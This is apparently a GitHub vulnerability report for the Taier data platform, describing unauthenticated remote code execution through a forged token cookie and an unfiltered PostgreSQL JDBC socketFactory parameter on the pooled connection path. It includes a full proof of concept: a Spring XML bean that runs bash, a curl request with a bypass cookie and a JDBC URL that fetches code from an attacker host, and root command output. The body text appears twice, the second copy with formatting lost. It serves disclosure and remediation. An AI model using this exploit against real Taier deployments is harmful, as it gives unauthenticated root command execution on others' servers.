Search before asking
What happened
Taier allows unauthenticated command execution through POST /taier/api/dataSource/addDs/testCon. Any non-empty token cookie reaches the datasource APIs, and the pooled JDBC path forwards attacker-controlled PostgreSQL URL parameters to the driver without applying the DANGEROUS_PARAMS check used on the simple path.
What you expected to happen
RCE Vulnerability is Fixed
How to reproduce
Details
A request without a cookie to POST /taier/api/dataSource/addDs/queryDsClassifyList returned {"code":0,"message":"not login","data":null,"space":0,"success":false,"version":null} during the live test. The same request with Cookie: token=bypass;userId=1;tenantId=1 returned {"code":1,...} and the datasource classify list, so a forged non-empty cookie is enough to reach the datasource endpoints.
/testCon requires one existing SFTP component record, and the same forged cookie can create it through POST /taier/api/upload/component/addOrUpdateComponent. After that, the request path reaches ConnFactory#getConn -> getCpConn -> transHikari -> HikariDataSource#setJdbcUrl; the simple getSimpleConn path has a DANGEROUS_PARAMS denylist, but the pooled path used here does not. A PostgreSQL URL with socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext therefore causes the bundled driver to fetch attacker-controlled Spring XML from socketFactoryArg and execute the embedded ProcessBuilder before the connection attempt finishes.
PoC
Deploy the official Taier stack with dtopensource/taier:latest, dtopensource/taier-mysql:latest, and zookeeper:3.4.9, and expose Taier at http://127.0.0.1:8090. On an attacker-controlled host reachable from the Taier container, save the following XML as evil.xml and serve it with python3 -m http.server 18080:
<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="exec" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value>id > /tmp/TAIER_PWN_hostproof && echo hostproof >> /tmp/TAIER_PWN_hostproof</value>
</list>
</constructor-arg>
</bean>
</beans>
Observed vulnerable datasource test:
HOST_IP=<attacker_host_ip_reachable_from_container>
curl -s -X POST 'http://127.0.0.1:8090/taier/api/dataSource/addDs/testCon' \
-H 'Content-Type: application/json' \
-H 'Cookie: token=bypass;userId=1;tenantId=1' \
-d "{\"dataType\":\"PostgreSQL\",\"dataVersion\":\"\",\"dataName\":\"pwn\",\"dataDesc\":\"\",\"dataJsonString\":\"{\\\"jdbcUrl\\\":\\\"jdbc:postgresql://${HOST_IP}:3308/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://${HOST_IP}:18080/evil.xml\\\",\\\"username\\\":\\\"test\\\",\\\"password\\\":\\\"test\\\"}\"}"
{"code":10,"message":"ExecutionException: java.lang.Exception: com.dtstack.taier.datasource.api.exception.SourceException: Failed to get database connection: The SocketFactory class provided org.springframework.context.support.ClassPathXmlApplicationContext could not be instantiated.","data":null,"space":0,"success":false,"version":null}
The attacker HTTP server received the following requests in the live test:
172.16.6.4 - - [07/Jul/2026 13:56:48] "GET /evil.xml HTTP/1.1" 200 -
172.16.6.4 - - [07/Jul/2026 13:56:48] "GET /evil.xml HTTP/1.1" 200 -
Verify command execution inside the Taier container:
docker exec taier cat /tmp/TAIER_PWN_hostproof
uid=0(root) gid=0(root) groups=0(root)
hostproof
Anything else
Impact
An unauthenticated network attacker can execute arbitrary OS commands as root in the default Taier container.
Suggested Fix
Reject forged cookies by validating the real session or token. Apply a strict JDBC property allowlist before every connection path, including the pooled HikariDataSource path.
Version
master
Are you willing to submit PR?
Code of Conduct
Search before asking
What happened
Taier allows unauthenticated command execution through
POST /taier/api/dataSource/addDs/testCon. Any non-emptytokencookie reaches the datasource APIs, and the pooled JDBC path forwards attacker-controlled PostgreSQL URL parameters to the driver without applying theDANGEROUS_PARAMScheck used on the simple path.What you expected to happen
RCE Vulnerability is Fixed
How to reproduce
Details
A request without a cookie to
POST /taier/api/dataSource/addDs/queryDsClassifyListreturned{"code":0,"message":"not login","data":null,"space":0,"success":false,"version":null}during the live test. The same request withCookie: token=bypass;userId=1;tenantId=1returned{"code":1,...}and the datasource classify list, so a forged non-empty cookie is enough to reach the datasource endpoints./testConrequires one existing SFTP component record, and the same forged cookie can create it throughPOST /taier/api/upload/component/addOrUpdateComponent. After that, the request path reachesConnFactory#getConn -> getCpConn -> transHikari -> HikariDataSource#setJdbcUrl; the simplegetSimpleConnpath has aDANGEROUS_PARAMSdenylist, but the pooled path used here does not. A PostgreSQL URL withsocketFactory=org.springframework.context.support.ClassPathXmlApplicationContexttherefore causes the bundled driver to fetch attacker-controlled Spring XML fromsocketFactoryArgand execute the embeddedProcessBuilderbefore the connection attempt finishes.PoC
Deploy the official Taier stack with
dtopensource/taier:latest,dtopensource/taier-mysql:latest, andzookeeper:3.4.9, and expose Taier athttp://127.0.0.1:8090. On an attacker-controlled host reachable from the Taier container, save the following XML asevil.xmland serve it withpython3 -m http.server 18080:Observed vulnerable datasource test:
{"code":10,"message":"ExecutionException: java.lang.Exception: com.dtstack.taier.datasource.api.exception.SourceException: Failed to get database connection: The SocketFactory class provided org.springframework.context.support.ClassPathXmlApplicationContext could not be instantiated.","data":null,"space":0,"success":false,"version":null}The attacker HTTP server received the following requests in the live test:
Verify command execution inside the Taier container:
docker exec taier cat /tmp/TAIER_PWN_hostproofAnything else
Impact
An unauthenticated network attacker can execute arbitrary OS commands as
rootin the default Taier container.Suggested Fix
Reject forged cookies by validating the real session or token. Apply a strict JDBC property allowlist before every connection path, including the pooled
HikariDataSourcepath.Version
master
Are you willing to submit PR?
Code of Conduct